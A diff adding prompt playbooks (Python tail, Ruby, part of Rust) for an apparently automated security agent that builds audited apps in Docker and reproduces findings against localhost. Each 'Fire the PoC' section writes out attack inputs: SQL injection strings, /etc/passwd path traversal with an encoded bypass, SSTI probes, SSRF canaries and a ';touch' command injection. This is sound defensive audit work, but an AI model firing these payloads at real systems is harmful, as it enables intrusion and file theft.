+- **Library / CLI (no server):** there is nothing to serve — go to Fallbacks and
+  drive the vulnerable API from a unit test (`method: unit-test`).
+
+---
+
+## 4. Dependencies
+
+Restore from the project's lockfile/manifest — do **not** upgrade, that changes
+the audited dependency set. Inside the container (or in the build):
+
+```sh
+# pip + requirements (most common):
+pip install -r requirements.txt          # add -r requirements-dev.txt if the PoC needs it
+
+# editable install of the package itself (for libraries / console_scripts):
+pip install -e .
+
+# poetry (lockfile present):
+pip install poetry && poetry install --no-interaction --no-root
+
+# uv (fast; lockfile present):
+pip install uv && uv sync --frozen        # --frozen honors uv.lock exactly
+
+# pipenv:
+pip install pipenv && pipenv install --deploy --system   # --deploy honors Pipfile.lock
+```
+
+- Honor the lockfile exactly. Avoid `pip install -U`, `poetry update`, or
+  `uv lock`.
+- Native wheel build failures → install the matching `-dev` lib (see 3b:
+  `libpq-dev`, `libssl-dev`, `libffi-dev`, `libxml2-dev`/`libxslt1-dev`,
+  `default-libmysqlclient-dev`).
+- Prefer a venv-free container install (the image is disposable). If the project
+  hard-requires a venv, `python -m venv /venv && . /venv/bin/activate` first.
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name:
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+
+docker run -d --name $CN -p 127.0.0.1:$PORT:8000 \
+  -e SECRET_KEY=$(openssl rand -hex 32) -e DEBUG=1 -e ALLOWED_HOSTS='*' \
+  $IMG python manage.py runserver 0.0.0.0:8000
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. Adjust
+the container port and the start command per framework (Django/FastAPI/gunicorn
+default **8000**; `flask run` defaults to **5000** unless `--port` is set).
+
+Confirm it is up (poll, don't sleep blindly):
+
+```sh
+for i in $(seq 1 30); do
+  curl -fsS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  sleep 1
+done
+docker logs --tail 50 $CN          # inspect boot errors if curl never succeeds
+```
+
+Common ports inside the container: Django/FastAPI/gunicorn **8000**, Flask dev
+server **5000**. A 404 at `/` still means the server is up — health-check on any
+route that returns a response, or check `docker logs` for the "listening" line.
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **Django DB:** migrate, then create a throwaway user inside the container:
+
+  ```sh
+  docker exec $CN python manage.py migrate --noinput
+  docker exec $CN python manage.py shell -c \
+    'from django.contrib.auth import get_user_model as g; U=g(); \
+     U.objects.filter(username="poc").exists() or \
+     U.objects.create_user("poc","poc@local.test","Poc-Passw0rd!")'
+  # superuser variant if the PoC needs admin:
+  docker exec $CN sh -c 'DJANGO_SUPERUSER_PASSWORD=Poc-Passw0rd! \
+     python manage.py createsuperuser --noinput --username poc --email poc@local.test' \
+     2>/dev/null || true
+  ```
+
+- **Flask / FastAPI:** there is no universal ORM/seed CLI. Seed via the app's
+  own DB layer in a one-off exec, e.g.:
+
+  ```sh
+  docker exec $CN python -c \
+    'from app import db, User; db.create_all(); \
+     db.session.add(User(email="poc@local.test", password="Poc-Passw0rd!")); \
+     db.session.commit()'
+  ```
+
+  (substitute the real models/session import; if the app seeds on first boot or
+  via a fixture/`flask db upgrade`, use that instead).
+
+- **Auth flow:** if the PoC needs a session, log in via the app's own login
+  endpoint with the seeded creds and keep the cookie jar:
+
+  ```sh
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID \
+    -d 'username=poc&password=Poc-Passw0rd!' \
+    "http://127.0.0.1:$PORT/login"          # Django needs the CSRF token too — see §7
+  ```
+
+  Token-auth APIs (DRF/FastAPI): POST creds to the token endpoint, capture the
+  returned token, send it as `Authorization: Bearer <tok>` / `Token <tok>`.
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples per class:
+
+```sh
+# SQLi / injection — observe error or extracted marker in the response:
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/search?q=%27%20OR%201=1--" | tee /tmp/poc.$FID.out
+
+# Path traversal / file read — pull a host file the app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+
+# SSTI (Jinja2/Django templates) — prove evaluation with arithmetic, then escalate:
+curl -s "http://127.0.0.1:$PORT/render?name=%7B%7B7*7%7D%7D" | grep -o 49
+
+# SSRF — point at a CONTAINER-LOCAL listener you control, never a real host:
+docker exec -d $CN python -m http.server 9999      # canary in-container
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/"
+
+# Insecure deserialization (pickle/yaml.load) / RCE — prove code exec by a
+# benign in-container side effect (touch a sentinel), then read it back:
+curl -s --data-binary @/tmp/payload.$FID "http://127.0.0.1:$PORT/<sink>"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# Django POST needs the CSRF token — fetch it from the form/cookie first:
+TOKEN=$(curl -s -c /tmp/jar.$FID "http://127.0.0.1:$PORT/login" \
+  | grep -oP 'csrfmiddlewaretoken" value="\K[^"]+')
+curl -s -b /tmp/jar.$FID -c /tmp/jar.$FID \
+  -d "csrfmiddlewaretoken=$TOKEN&username=poc&password=Poc-Passw0rd!" \
+  "http://127.0.0.1:$PORT/login"
+```
+
+Evidence to record for the repro result:
+
+- The exact request (method, path, headers, body) → `poc`.
+- The response/log line proving impact (leaked row, file contents, sentinel
+  file, `49` from `7*7`, reflected script, 500 with traceback) → `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN`; no outbound
+connections; no real data; side effects are benign sentinels only.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/Dockerfile.$FID /tmp/payload.$FID
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`):
+
+1. **Won't serve but builds (library/CLI, or web boot blocked):** drive the
+   vulnerable function directly with a Python snippet/test in the container.
+   Set `method: unit-test`.
+
+   ```sh
+   docker run --rm -v "$WT":/app -w /app $IMG \
+     python -c 'from the_pkg.mod import vuln_fn; \
+                out=vuln_fn("<payload>"); \
+                assert "<impact marker>" in str(out), out; print("PWNED", out)'
+   # or, if a suite exists: pytest tests/test_<focused>.py -x -q
+   ```
+
+2. **Image builds but the app can't start (missing DB/config/migrations, native
+   wheel):** record that the dependency set installs and the vulnerable code is
+   present and reachable, with the source→sink trace as evidence. Set
+   `method: build-only`.
+
+3. **Cannot build at all (toolchain/network blocked):** construct a static PoC —
+   the exact crafted input plus the line-referenced source→sink path showing why
+   it triggers. Set `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/playbooks/ruby.md b/plugins/security/prompts/playbooks/ruby.md
new file mode 100644
index 0000000..f7a2446
--- /dev/null
+++ b/plugins/security/prompts/playbooks/ruby.md
@@ -0,0 +1,265 @@
+# ENV Playbook — Ruby
+
+Build, run, and exploit a Ruby target (Rails / Sinatra / Rack / plain gem) to
+reproduce a candidate finding with a real PoC. Docker-first; the native Ruby
+toolchain may be absent on the host. Keep ALL traffic inside the local
+container — no external hosts, no real credentials, no data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+ls Gemfile Gemfile.lock *.gemspec config.ru Rakefile 2>/dev/null
+find . -maxdepth 3 -name '*.rb' | head
+```
+
+- **Manifests:** `Gemfile` / `Gemfile.lock` (Bundler), `*.gemspec` (a gem),
+  `config.ru` (Rack rackup entrypoint).
+- **Framework tells:**
+  - Rails → `config/application.rb`, `bin/rails`, `app/`, `gem 'rails'`.
+  - Sinatra → `gem 'sinatra'`, `require 'sinatra'`.
+  - Rack/other → `config.ru` only, or a `*.gemspec` library with no web server.
+- **Ruby version:** `.ruby-version`, `.tool-versions`, or the `ruby` directive
+  in `Gemfile` / `*.gemspec` required_ruby_version. Match the image to it.
+
+```sh
+cat .ruby-version 2>/dev/null; grep -E "^\s*ruby ['\"]" Gemfile 2>/dev/null
+```
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+---
+
+## 3. Build & run (docker-first)
+
+### 3a. If the repo ships its own Docker
+
+Prefer the project's own definition — it usually wires up DB, env, and
+migrations for you.
+
+```sh
+# Compose (opportunistic — the plugin may be missing):
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+
+# Otherwise plain docker with the repo Dockerfile (the reliable path):
+docker build -t $IMG .
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Pick the Ruby tag from step 1 (fall back to a recent stable, e.g.
+`ruby:3.3-slim`). Build deps cover native gems (`pg`, `nokogiri`, `sqlite3`,
+`mysql2`).
+
+```sh
+cat > /tmp/Dockerfile.$FID <<'EOF'
+FROM ruby:3.3-slim
+RUN apt-get update && apt-get install -y --no-install-recommends \
+      build-essential git curl libpq-dev libsqlite3-dev libyaml-dev pkg-config \
+  && rm -rf /var/lib/apt/lists/*
+WORKDIR /app
+COPY Gemfile* *.gemspec ./
+RUN gem install bundler && (bundle install --jobs 4 || true)
+COPY . .
+RUN bundle install --jobs 4
+EXPOSE 3000
+# overridden at run time per framework (see below)
+CMD ["bash"]
+EOF
+
+docker build -f /tmp/Dockerfile.$FID -t $IMG .
+```
+
+Start command depends on the framework (set host `PORT`, bind app to `0.0.0.0`):
+
+- **Rails:** `bundle exec rails server -b 0.0.0.0 -p 3000`
+  (set `RAILS_ENV=development` and a dummy `SECRET_KEY_BASE=$(openssl rand -hex 32)`).
+- **Rack/Sinatra w/ `config.ru`:** `bundle exec rackup -o 0.0.0.0 -p 3000`
+- **Sinatra single file:** `bundle exec ruby app.rb -o 0.0.0.0 -p 4567`
+  (Sinatra classic default port is 4567).
+- **Library gem (no server):** there is nothing to serve — go to Fallbacks and
+  drive the vulnerable API from a unit test (`method: unit-test`).
+
+---
+
+## 4. Dependencies
+
+Inside the container (or in the build), Bundler restores from the lockfile:
+
+```sh
+bundle install --jobs 4 --retry 3
+```
+
+- Honor `Gemfile.lock` exactly; do **not** `bundle update` (that changes the
+  audited dependency set).
+- Native gem build failures → ensure the matching `-dev` lib is installed
+  (see 3b: `libpq-dev`, `libsqlite3-dev`, `libyaml-dev`, etc.).
+- Rails apps may need assets/secrets to boot: precompile is usually skippable in
+  dev; if it insists, `RAILS_ENV=development` avoids prod asset/secret checks.
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name:
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+
+docker run -d --name $CN -p 127.0.0.1:$PORT:3000 \
+  -e RAILS_ENV=development -e SECRET_KEY_BASE=$(openssl rand -hex 32) \
+  $IMG bundle exec rails server -b 0.0.0.0 -p 3000
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. Adjust
+the container port (`:3000` / `:4567`) and the start command per framework.
+
+Confirm it is up (poll, don't sleep blindly):
+
+```sh
+for i in $(seq 1 30); do
+  curl -fsS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  sleep 1
+done
+docker logs --tail 50 $CN          # inspect boot errors if curl never succeeds
+```
+
+Common ports inside the container: Rails/rackup **3000**, Sinatra classic
+**4567**. WEBrick/Puma both honor `-p`.
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **Rails DB:** create/migrate, then seed a throwaway user inside the container:
+
+  ```sh
+  docker exec $CN bundle exec rails db:create db:schema:load 2>/dev/null \
+    || docker exec $CN bundle exec rails db:create db:migrate
+  docker exec $CN bundle exec rails runner \
+    'u=User.new(email:"poc@local.test"); u.password="Poc-Passw0rd!" if u.respond_to?(:password=); u.save!(validate:false) rescue nil'
+  ```
+
+- **Auth flow:** if the PoC needs a session, log in via the app's own login
+  endpoint with the seeded creds and keep the cookie jar:
+
+  ```sh
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID \
+    -d 'email=poc@local.test&password=Poc-Passw0rd!' \
+    "http://127.0.0.1:$PORT/login"
+  ```
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples per class:
+
+```sh
+# SQLi / injection — observe error or extracted marker in the response:
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/search?q=%27%20OR%201=1--" | tee /tmp/poc.$FID.out
+
+# Path traversal / file read — pull a host file the app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+
+# SSRF — point at a CONTAINER-LOCAL listener you control, never a real host:
+docker exec -d $CN ruby -run -e httpd . -p 9999    # canary in-container
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/"
+
+# Deserialization / RCE — prove code exec by a benign in-container side effect
+# (e.g. touch a sentinel file), then read it back; do NOT run destructive cmds:
+curl -s --data-binary @/tmp/payload.$FID "http://127.0.0.1:$PORT/<sink>"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+```
+
+Evidence to record for the repro result:
+
+- The exact request (method, path, headers, body) → `poc`.
+- The response/log line proving impact (leaked row, file contents, sentinel
+  file, reflected script, 500 with stack) → `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN`; no outbound
+connections; no real data; side effects are benign sentinels only.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/Dockerfile.$FID /tmp/payload.$FID
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`):
+
+1. **Won't serve but builds (library gem, or web boot blocked):** drive the
+   vulnerable method directly with a Ruby test in the container. Set
+   `method: unit-test`.
+
+   ```sh
+   docker run --rm -v "$WT":/app -w /app $IMG \
+     ruby -Ilib -e 'require "the_lib"; <call vulnerable API with payload>; <assert impact>'
+   # or, if specs exist: bundle exec rspec spec/<focused>_spec.rb
+   ```
+
+2. **Image builds but the app can't start (missing DB/config, native gem):**
+   record that the dependency set installs and the vulnerable code is present
+   and reachable, with the source→sink trace as evidence. Set
+   `method: build-only`.
+
+3. **Cannot build at all (toolchain/network blocked):** construct a static PoC —
+   the exact crafted input plus the line-referenced source→sink path showing why
+   it triggers. Set `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/playbooks/rust.md b/plugins/security/prompts/playbooks/rust.md
new file mode 100644
index 0000000..9853b26
--- /dev/null
+++ b/plugins/security/prompts/playbooks/rust.md
@@ -0,0 +1,458 @@
+# ENV Playbook — Rust
+
+Build, run, and exploit a Rust target (actix-web / axum / rocket / warp / hyper,
+or a plain CLI / library crate) to reproduce a candidate finding with a real
+PoC. Docker-first; the native Rust toolchain may be absent on the host. Keep ALL
+traffic inside the local container — no external hosts, no real credentials, no
+data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+ls Cargo.toml Cargo.lock rust-toolchain rust-toolchain.toml Dockerfile docker-compose.yml 2>/dev/null
+find . -maxdepth 3 -name '*.rs' -not -path '*/target/*' | head
+```
+
+- **Manifests:** `Cargo.toml` (always). It declares the crate `name`, the
+  `edition` (2015/2018/2021/2024), `[dependencies]`, and whether it is a binary
+  (`[[bin]]` / `src/main.rs`), a library (`[lib]` / `src/lib.rs`), or a
+  **workspace** (`[workspace]` with a `members = [...]` list — multiple crates).
+  `Cargo.lock` pins exact dependency versions (committed for binaries; honor it).
+- **Toolchain version:** `rust-toolchain.toml` or `rust-toolchain` pins the
+  exact `channel` (e.g. `1.79.0`, `stable`, `nightly`). Match the image tag to
+  it — a crate using newer syntax/edition will fail on an older `rustc`.
+- **Binary vs library:** `src/main.rs` (or `[[bin]]`) is a runnable binary;
+  `src/lib.rs` (or `[lib]` with no bin) is a library with nothing to serve →
+  Fallbacks, drive the sink from a `#[test]`.
+
+  ```sh
+  ls src/main.rs src/lib.rs 2>/dev/null
+  find . -maxdepth 4 -path '*/src/main.rs' -not -path '*/target/*'   # workspace bins
+  grep -nE '^\s*(edition|name)\s*=' Cargo.toml
+  cat rust-toolchain.toml rust-toolchain 2>/dev/null
+  ```
+
+- **Framework tells** (read `[dependencies]` in `Cargo.toml`, or `use` imports):
+  - **actix-web** → `actix-web`; `HttpServer::new(...).bind(...)`. Default bind
+    in examples is `127.0.0.1:8080`.
+  - **axum** → `axum` (+ `tokio`, `hyper`, `tower`); `axum::serve` /
+    `Server::bind`. Commonly `0.0.0.0:3000`.
+  - **rocket** → `rocket`; `#[launch]` / `rocket::build()`. Default `8000`,
+    binds `127.0.0.1` unless `ROCKET_ADDRESS=0.0.0.0`.
+  - **warp** → `warp`; `warp::serve(...).run((addr, port))`.
+  - **hyper / tower** (low-level) → `hyper`, `tower`. **tonic** → gRPC over
+    `tonic` (+ `prost`, a `build.rs`, `.proto` files); default `50051`.
+  - **Async runtime** is almost always `tokio` (`#[tokio::main]`); `async-std`
+    is the alternative.
+  - Library / CLI (no server crate, no `bind`/`serve`) → nothing to serve; go to
+    Fallbacks and drive the sink from a test.
+- **The bind address is ground truth.** Find the port and bind address — you must
+  map and bind exactly what the code listens on:
+
+  ```sh
+  grep -rnE '\.bind\(|::bind|serve\(|ListenAndServe|TcpListener::bind|"0\.0\.0\.0|"127\.0\.0\.1|:[0-9]{2,5}"' \
+    --include='*.rs' . | grep -v /target/ | head
+  ```
+
+  Note whether it binds `0.0.0.0:8080` (all interfaces, mappable) vs
+  `127.0.0.1:8080` (loopback only — see Run & health-check for how to still
+  reach it). Many apps read the addr from env (`HOST`/`PORT`/`BIND_ADDR`,
+  `ROCKET_ADDRESS`/`ROCKET_PORT`) — prefer overriding that to `0.0.0.0`.
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+Never copy a host `target/` dir into the build — it is huge and may carry
+host-native artifacts and stale state. Keep it (and `.git`) out of the build
+context so the container compiles fresh:
+
+```sh
+printf 'target\n.git\n**/*.rs.bk\n' > /tmp/va-$FID.dockerignore
+```
+
+---
+
+## 3. Build & run (docker-first)
+
+### 3a. If the repo ships its own Docker
+
+Prefer the project's own definition — it usually wires up the build profile,
+env, DB, and the correct entry binary for you.
+
+```sh
+# Compose (opportunistic — the plugin may be missing):
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+
+# Otherwise plain docker with the repo Dockerfile (the reliable path):
+docker build -t $IMG .
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Pick the Rust tag from `rust-toolchain.toml` / the `edition` in `Cargo.toml`
+(fall back to a recent stable, e.g. `rust:1.79-bookworm`). A multi-stage build
+compiles in the SDK image and runs the binary in a small Debian base.
+
+**Build a debug profile, not `--release`** — release LTO compiles are slow and
+the audit cares about behavior, not perf. Copy manifests first so the (slow)
+dependency compile is cached separately from the source.
+
+```sh
+# Resolve the binary crate name (default to the package name in Cargo.toml):
+BIN=$(grep -m1 -E '^\s*name\s*=' Cargo.toml | sed -E 's/.*"([^"]+)".*/\1/')
+
+cat > /tmp/Dockerfile.$FID <<EOF
+FROM rust:1.79-bookworm AS build
+WORKDIR /src
+# Copy manifests first for dependency-layer caching.
+COPY Cargo.toml ./
+COPY Cargo.lock* ./
+# Pre-compile deps against a stub main so editing source doesn't refetch/rebuild
+# the whole dependency graph. (cargo-chef does this more robustly if available.)
+RUN mkdir -p src && echo 'fn main(){}' > src/main.rs \
+ && (cargo build || true) && rm -rf src
+COPY . .
+# Build the actual sources (debug profile — faster than --release).
+RUN cargo build --locked --bins || cargo build --bins
+# Stage the produced binary out of target/debug.
+RUN cp "target/debug/$BIN" /out_app 2>/dev/null \
+ || cp "\$(find target/debug -maxdepth 1 -type f -executable ! -name '*.d' | head -1)" /out_app
+
+FROM debian:12-slim
+RUN apt-get update && apt-get install -y --no-install-recommends \
+      ca-certificates curl libssl3 \
+  && rm -rf /var/lib/apt/lists/*
+COPY --from=build /out_app /app
+EXPOSE 8080
+ENTRYPOINT ["/app"]
+EOF
+
+docker build -f /tmp/Dockerfile.$FID --iidfile /tmp/va-$FID.iid -t $IMG "$WT"
+```
+
+`--locked` forces the build to honor `Cargo.lock` exactly (errors if it would
+change) — important for auditing the pinned dependency set. The fallback drops
+it for the rare repo with a stale/absent lock.
+
+If the runtime needs the toolchain present (e.g. to run tests, or to recompile
+for a Fallback), or the binary needs shell tooling for a PoC sentinel, just run
+straight from the `rust` image with the worktree mounted read-only:
+
+```sh
+docker run -d --name $CN -p 127.0.0.1:$PORT:8080 -w /src -v "$WT":/src:ro \
+  rust:1.79-bookworm sh -c "cargo build --locked && exec ./target/debug/$BIN"
+# NOTE: a :ro mount can't write target/ — drop :ro or build to a tmp CARGO_TARGET_DIR:
+#   -e CARGO_TARGET_DIR=/tmp/target
+```
+
+Start command, by how the project runs (the binary must bind `0.0.0.0` /
+`:PORT`, not `127.0.0.1`, or the mapped host port can't reach it):
+
+- **Single server binary:** the built `/app` is the entry (the `ENTRYPOINT`
+  above). Pass config via flags/env at run time.
+- **Workspace with multiple bins:** build/run the specific one
+  (`cargo build -p <crate> --bin <name>`) — pick the server, not a migrator/CLI.
+- **Reads bind addr from env:** pass it. actix/axum often read `HOST`/`PORT` or
+  a `BIND_ADDR`; rocket reads `ROCKET_ADDRESS` / `ROCKET_PORT`. Force
+  `0.0.0.0` so the mapped port is reachable.
+- **Library / CLI only:** nothing to serve → Fallbacks, `method: unit-test`.
+
+---
+
+## 4. Dependencies
+
+Restore reproducibly; `Cargo.lock` pins exact versions and Cargo verifies crate
+checksums against it:
+
+```sh
+cargo fetch --locked     # download every locked dependency into the registry cache
+cargo build --locked     # compile honoring Cargo.lock exactly (no version drift)
+```
+
+- Do **not** `cargo update` / bump versions — that changes the audited
+  dependency set. `--locked` errors if a build would mutate `Cargo.lock`;
+  `--offline` builds entirely from the cache once fetched.
+- **Native / `*-sys` crates** (e.g. `openssl-sys`, `libpq`/`pq-sys`,
+  `rdkafka-sys`) link C libraries and need dev headers + `pkg-config` at build
+  time. The `rust:bookworm` image has `gcc`/`pkg-config`; add the specific lib,
+  e.g. `apt-get install -y libssl-dev libpq-dev`. The runtime base then needs
+  the shared lib (`libssl3`, `libpq5`).
+- **Vendored deps:** a `.cargo/config.toml` with `[source.crates-io]` replaced by
+  a `vendor/` directory means deps are checked in — build offline, no network.
+- **Private registries / git deps with auth:** if a dep path can't resolve it
+  likely needs credentials — out of scope; do not supply real secrets. Note it
+  and fall back if the build blocks.
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name:
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+
+docker run -d --name $CN -p 127.0.0.1:$PORT:8080 \
+  -e HOST=0.0.0.0 -e PORT=8080 -e BIND_ADDR=0.0.0.0:8080 \
+  -e ROCKET_ADDRESS=0.0.0.0 -e ROCKET_PORT=8080 \
+  $IMG
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. Map the
+container port (`:8080`) to whatever the code actually listens on (read the
+`.bind(...)` / `serve` arg — common defaults: actix **8080**, axum **3000**,
+rocket **8000**, warp varies, tonic/gRPC **50051**).
+
+**If the app binds `127.0.0.1` inside the container** (hardcoded, not from env),
+a `-p` map can't reach it (loopback is per-namespace). Either fire the PoC from
+inside the container (`docker exec $CN ...` — the `debian:12-slim` runtime has a
+shell; install `curl` if missing), or run with `--network host` on Linux so the
+container's loopback is the host's:
+
+```sh
+docker run -d --name $CN --network host $IMG    # then target 127.0.0.1:<code-port>
+```
+
+Confirm it is up (poll, don't sleep blindly):
+
+```sh
+for i in $(seq 1 30); do
+  curl -fsS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  sleep 1
+done
+docker logs --tail 50 $CN          # inspect boot errors if curl never succeeds
+```
+
+A 404 on `/` still means the server is up — any TCP/HTTP response counts as
+healthy. Look for the framework boot line in the logs (actix `starting N
+workers` / `Starting "actix-web-service-..."`, axum/tokio nothing by default —
+add `RUST_LOG=debug` and look for tower/hyper accept logs, rocket's `Rocket has
+launched from http://...` banner). For a **tonic/gRPC** target, plain `curl`
+won't health-check it; probe with `grpcurl` (see Fire the PoC). Setting
+`-e RUST_LOG=debug -e RUST_BACKTRACE=1` makes boot failures and panics legible.
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **DB-backed app:** check for a migrations dir and the tool in use — `sqlx`
+  (`migrations/`, `sqlx migrate run`), `diesel` (`migrations/`,
+  `diesel migration run` / `diesel_migrations` embedded at boot), `sea-orm`
+  (`migration/` crate). Run it inside the container:
+
+  ```sh
+  docker exec $CN sh -c 'sqlx migrate run 2>/dev/null \
+    || diesel migration run 2>/dev/null \
+    || /app migrate 2>/dev/null || true'
+  ```
+
+  Many Rust apps with `diesel_migrations`/`sqlx::migrate!` run migrations on
+  boot — then there's nothing to seed beyond the auth step below. A
+  `DATABASE_URL` env is usually required (`-e DATABASE_URL=...`).
+
+- **Auth flow:** if the PoC needs a session/token, register or log in via the
+  app's own endpoint with synthetic creds and keep the cookie jar / capture the
+  token:
+
+  ```sh
+  # Cookie-session apps:
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID \
+    -H 'Content-Type: application/json' \
+    -d '{"username":"poc","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/login"
+
+  # JWT/bearer apps — capture the token for the Authorization header:
+  TOKEN=$(curl -s -H 'Content-Type: application/json' \
+    -d '{"username":"poc","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/auth/login" \
+    | python3 -c 'import sys,json;d=json.load(sys.stdin);print(d.get("token") or d.get("access_token",""))')
+  ```
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples per class:
+
+```sh
+# SQL injection — raw query built with format!/string concat instead of bound
+# params (sqlx query!, diesel sql_query, rusqlite execute with formatted SQL):
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/user?id=1%20OR%201=1--" | tee /tmp/poc.$FID.out
+
+# Path traversal / arbitrary file read — std::fs::read / tokio::fs / actix
+# NamedFile / tower-http ServeDir on a user-controlled path; pull a file the
+# app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+# Encoded traversal that bypasses naive Path::join-after-strip:
+curl -s "http://127.0.0.1:$PORT/static/..%2f..%2f..%2fetc%2fpasswd" | head
+
+# Command injection / RCE — std::process::Command with a shell
+# (Command::new("sh").arg("-c").arg(user_input)) or args from user input.
+# Prove exec via a benign in-container sentinel, then read it back
+# (NEVER destructive commands):
+curl -s "http://127.0.0.1:$PORT/ping?host=127.0.0.1;touch%20/tmp/va-pwned"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
